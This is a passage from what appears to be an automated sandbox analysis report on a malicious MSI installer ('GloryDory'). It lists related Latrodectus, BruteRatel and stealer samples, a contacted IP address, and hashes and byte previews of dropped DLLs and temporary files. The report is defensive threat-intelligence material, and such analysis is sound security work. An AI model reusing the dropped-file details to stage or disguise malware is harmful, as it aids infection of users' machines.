                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                          • 188.114.97.3

                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\vierm_soft_x64.dllDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                            C:\Windows\Installer\MSI9E30.tmpDocument-18-33-08.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                              Document-19-51-48.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                dsa.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                  Document-19-27-03.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                    DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                      Document-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                        CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                                                                                                                                          DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                                                                                                                                                                                                                                            6ylVfr0IVw.msiGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                                                                              Document-19-25-24.jsGet hashmaliciousLatrodectusBrowse

                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                C:\Config.Msi\6a9d67.rbs

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):1220
                                                                                                                                                                                                                                                Entropy (8bit):5.687740847816095
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5OgJsrvgTU68NWdhW/nHN9RpUzgWg2FP9yWDhiSQ8vWfLK:MusrIn8NWdhWPHN9bH6P5D8S/r
                                                                                                                                                                                                                                                MD5:34E54C7DE1B74CD070864D8BA9419FEE
                                                                                                                                                                                                                                                SHA1:4040CA427DD9F1D6EFF121E12AE3309559C46EC6
                                                                                                                                                                                                                                                SHA-256:E566A36591D3454C54BEAA64C8667510EE8F8673455564E150F688FB5878CB99
                                                                                                                                                                                                                                                SHA-512:BCCFED97EC90703EF8DAE93E634B05E338EC4EDC2EF9AEAC8AA350EA66FA2051913B6772DA1D5DA5DAD13D741A2AFC568D79494BB2F11F2FA6882326E7916662
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:...@IXOS.@.....@.uCY.@.....@.....@.....@.....@.....@......&.{68C54E68-8D6C-454F-B2BE-2596868E8867}..GloryDory..das.msi.@.....@...C.@.....@........&.{26C6701E-5BA5-48FD-87C5-16BC3575B429}.....@.....@.....@.....@.......@.....@.....@.......@......GloryDory......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@......&.{2B132521-4E05-4E2E-93F1-6029E2DAB7E0}&.{68C54E68-8D6C-454F-B2BE-2596868E8867}.@........CreateFolders..Creating folders..Folder: [1]#.=.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..#.C:\Users\user\AppData\Roaming\....5.C:\Users\user\AppData\Roaming\vierm_soft_x64.dll....WriteRegistryValues..Writing system registry

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\vierm_soft_x64.dll

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):767488
                                                                                                                                                                                                                                                Entropy (8bit):7.207925663165308
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:/h/M5nsxW5fFcrGn7Q21Svj07MGpmeSM6q4LWYv1AoMJPPyogk31OkRK1OKeQeq:/rD+JPPn8kM1Oej
                                                                                                                                                                                                                                                MD5:B1CA25F5BB4EDD293B3711C77EB99A6F
                                                                                                                                                                                                                                                SHA1:178BBA8686EA329B884A652FE0F8A0AE0C53D367
                                                                                                                                                                                                                                                SHA-256:97A6331239D451D7DFE15BFE17DE8B419DF741AE68BACD440808F8B8D3F99B8A
                                                                                                                                                                                                                                                SHA-512:D5A282A8F81E117B79616C44A260D89C7FEE06F4AC1387675BC79C3BD7599A5D49FBE3D8FB3D4D42EEA81A17564ABC2D42288BC2DC468D1B16ED633BA421B32D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: Document-18-33-08.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y...................G......G......G.....Y......Y......Y.......G......G......G......G.....Rich...........................PE..d......f..........# ...&.............Y.......................................0......R..... .............................................|...<...(.......X6...p...C..H~...*... ..........p...............................@............................................text...0........................... ..`.rdata...8.......:..................@..@.data....4...0......................@....pdata...C...p...D...*..............@..@memcpy_..............n..............@..._RDATA...............p..............@..@.rsrc...X6.......8...r..............@..@.reloc....... ......................@..B.......................................................................LfJGC6FArPDu4R9wt3v8YWSQNm7nxB2ZdHqjXsp..........................

                                                                                                                                                                                                                                                C:\Windows\Installer\6a9d65.msi

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {26C6701E-5BA5-48FD-87C5-16BC3575B429}, Number of Words: 10, Subject: GloryDory, Author: OrbitalMast LLC, Name of Creating Application: GloryDory, Template: ;1033, Comments: This installer database contains the logic and data required to install GloryDory., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1669120
                                                                                                                                                                                                                                                Entropy (8bit):7.187836999350755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:5Sj3YhW8zBQSc0ZnSKSZKumZr7A+zafUWM1q:oYY0ZnQK/A7fQ
                                                                                                                                                                                                                                                MD5:3CB6B99B20930AC0DBADC10899DC511E
                                                                                                                                                                                                                                                SHA1:570C4AB78CF4BB22B78AAC215A4A79189D4FA9ED
                                                                                                                                                                                                                                                SHA-256:EA1792F689BFE5AD3597C7F877B66F9FCF80D732E5233293D52D374D50CAB991
                                                                                                                                                                                                                                                SHA-512:AEDF58EA01D59CCE191CB9C0F83DBDBF7E3E8F049C764B577D6A957CB5229C50DDA7EC6760CA43AD4DBDB085AE02B07BC818F69CA08373243019AF6683E4931C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:......................>.......................................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...........................................................................................................................................................................................................................................................................................................................................................<...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...;...?...5...6...7...8...9...:.......=.......>.......@...A...B...C...D...........G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                                                C:\Windows\Installer\MSI9E30.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):446944
                                                                                                                                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: Document-18-33-08.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Document-19-51-48.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: dsa.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Document-19-27-03.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: DLPAgent.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Document-21-41-00.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: CITROEN.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: DLPAgent.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: 6ylVfr0IVw.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: Document-19-25-24.js, Detection: malicious, Browse
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Installer\MSI9EBE.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):446944
                                                                                                                                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Installer\MSI9EEE.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):446944
                                                                                                                                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Installer\MSI9F0E.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):446944
                                                                                                                                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Installer\MSI9F7C.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):401059
                                                                                                                                                                                                                                                Entropy (8bit):6.591907261694784
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:HMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1q:HMvZx0FlS68zBQSncb4ZPQTpAjZxqO1q
                                                                                                                                                                                                                                                MD5:D8CC5A9CEE0E7798D7D78433BFDA7BE9
                                                                                                                                                                                                                                                SHA1:08486D248BB3DADA72346E72A9489263BA55F0E2
                                                                                                                                                                                                                                                SHA-256:741A8EA3A2A75E11AAE640AFD9E9302D5270DF96FC3814741DCBBB8E62ED1AE6
                                                                                                                                                                                                                                                SHA-512:484BB7E5D84CD494487CC23383AFD8C46B30D4FF18506C42E01773385021D3BB892E1C3ECC9D30F369D35D1D3ABC34859DF1A11FE9B0CDB78344A1BBFE44597A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...@IXOS.@.....@.uCY.@.....@.....@.....@.....@.....@......&.{68C54E68-8D6C-454F-B2BE-2596868E8867}..GloryDory..das.msi.@.....@...C.@.....@........&.{26C6701E-5BA5-48FD-87C5-16BC3575B429}.....@.....@.....@.....@.......@.....@.....@.......@......GloryDory......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}=.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}..01:\Software\OrbitalMast LLC\GloryDory\Version.@.......@.....@.....@......&.{2B132521-4E05-4E2E-93F1-6029E2DAB7E0}5.C:\Users\user\AppData\Roaming\vierm_soft_x64.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".=.C:\Users\user\AppData\Roaming\OrbitalMast LLC\GloryDory\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@

                                                                                                                                                                                                                                                C:\Windows\Installer\MSIA029.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):399328
                                                                                                                                                                                                                                                Entropy (8bit):6.589290025452677
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                                                                                                                MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                                                SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                                                                                                                SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                                                                                                                SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Installer\SourceHash{68C54E68-8D6C-454F-B2BE-2596868E8867}

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):1.1618398199562698
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:JSbX72FjZAGiLIlHVRpqh/7777777777777777777777777vDHFegQygvKpZl0i5:JHQI56NEF
                                                                                                                                                                                                                                                MD5:BB46B9A4E65F80A4BDE73FF1B5AAB4D4
                                                                                                                                                                                                                                                SHA1:9A7E626DA2C848DCDDD03939A778DBA54D2ABF02
                                                                                                                                                                                                                                                SHA-256:7BB3B290F9BE21BA651FBC7BF7F480D51F4A312516D6C10F9E21ACBE8C25961A
                                                                                                                                                                                                                                                SHA-512:B2A88A07D4F54723026796E4BB2FE03CD38F8B80C612D6CEF01D0DBC629CDF4ABF9140CC1886409151F4BAE0C79AD821FD9C014B9B50D8B66C1E28CB8A7D6843
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):1.5505568132384608
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Q8Ph0uRc06WXJenT5F5TI6qS+6YAE+lCyEMT6qS+6GTkvNxv:/h011nT7dI6qr6nZlCoT6qr6j7
                                                                                                                                                                                                                                                MD5:8DD15CCFC0DB4BA31DE71BDDAD16B815
                                                                                                                                                                                                                                                SHA1:F44D80159BCB856F3AE7A23EF16282891FD45AAA
                                                                                                                                                                                                                                                SHA-256:C1981BE6C444539FE669CB729A26B96125196DB5435D49F78F3AAD7EDDC54F0F
                                                                                                                                                                                                                                                SHA-512:23E7BEA8B3396CD939BB01A24F145F0E783DB3552D8A52016E2C988F88BCC0F8795B2640ECFCA39B830B422B6A4E3052E5E0333BFC89314F937F73C74FEFF157
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):360001
                                                                                                                                                                                                                                                Entropy (8bit):5.362967240123241
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauU:zTtbmkExhMJCIpEN
                                                                                                                                                                                                                                                MD5:DAFC755B7973130713F9A9CF7527FA22
                                                                                                                                                                                                                                                SHA1:B8E96B03CD8E67B04FABBB317B367CADE0BAE238
                                                                                                                                                                                                                                                SHA-256:21ADE0CA189868210835D4F30857B6737BF13C8D8C9AEF330BBB78110464933C
                                                                                                                                                                                                                                                SHA-512:7BEEC058EC0F1EE9650A7716EF97BAC08CD1B9795652C477A4B82E99F90A74B5F8887DDBF0F6230B80EFC994676E30D4EDC3F15CED2D15D32AB271ACA7F1237C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                                                                                                C:\Windows\Temp\~DF02075D584703F341.TMP

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Temp\~DF2228D537A12EB273.TMP

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Windows\Temp\~DF2E6A567C6688D3A4.TMP

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
